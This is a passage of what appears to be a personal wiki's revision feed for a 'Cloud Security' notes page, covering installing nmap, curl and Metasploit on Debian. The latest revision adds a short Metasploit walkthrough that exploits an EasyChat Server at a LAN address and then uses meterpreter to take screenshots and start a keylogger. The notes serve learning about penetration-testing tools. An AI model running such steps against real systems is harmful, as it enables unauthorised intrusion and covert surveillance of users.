Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Usage===&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
$ msf &amp;gt; search easychat&lt;br /&gt;
$ msf &amp;gt; use exploit/windows/http/efs_easychatserver_username&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; show options&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; set RHOST 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
msf exploit(windows/http/efs_easychatserver_username) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; ls&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; sysinfo&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; help&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; screenshot //to take a screenshot of the windows machine, we may use this command&lt;br /&gt;
&lt;br /&gt;
meterpreter &amp;gt; keyscan_start //starts keylogger for the target port. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1074</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1074"/>
		<updated>2021-01-10T00:42:36Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Usage===&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf &amp;gt; search easychat&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1073</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1073"/>
		<updated>2021-01-10T00:42:09Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Usage===&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ search easychat&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1072</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1072"/>
		<updated>2021-01-10T00:39:19Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==How to Install Metasploit Framework on Ubuntu/Debian==&lt;br /&gt;
&lt;br /&gt;
Download Metasploit installer using [[wget]] or [[curl]] command.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once the script is downloaded, make it executable.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ chmod +x msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Then execute the installer to install Metasploit Framework on Debian.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ ./msfinstall&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.&lt;br /&gt;
&lt;br /&gt;
Check your Framework version using:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole --version&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When installation is completed, create and initialize the msf database.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfdb init&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
This will create an initial database schema, set service account and start services. Output similar to below should be printed.&lt;br /&gt;
&lt;br /&gt;
Use printed credentials to access MSF Web Service &amp;amp; API.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Launching msfconsole&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now  that database is initialized, you can launch msfconsole&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfconsole&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Verify database connectivity with the db_status command as shown below.&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msf6 &amp;gt; db_status &lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Updating Metasploit Framework&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ msfupdate&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1071</id>
		<title>Cloud Security</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Cloud_Security&amp;diff=1071"/>
		<updated>2021-01-10T00:15:03Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Notes=&lt;br /&gt;
==[[nmap]] installation/Debian Linux==&lt;br /&gt;
Nmap (&amp;quot;Network Mapper&amp;quot;) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
to install nmap on debian server: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ apt-get install nmap&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
listen any port: &lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ nmap -sV 192.168.56.1&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
resource:&lt;br /&gt;
&lt;br /&gt;
* https://nmap.org&lt;br /&gt;
* https://nmap.org/book/inst-linux.html#inst-rpm&lt;br /&gt;
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Installing Curl on Debian==&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
$ sudo apt install curl&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
</feed>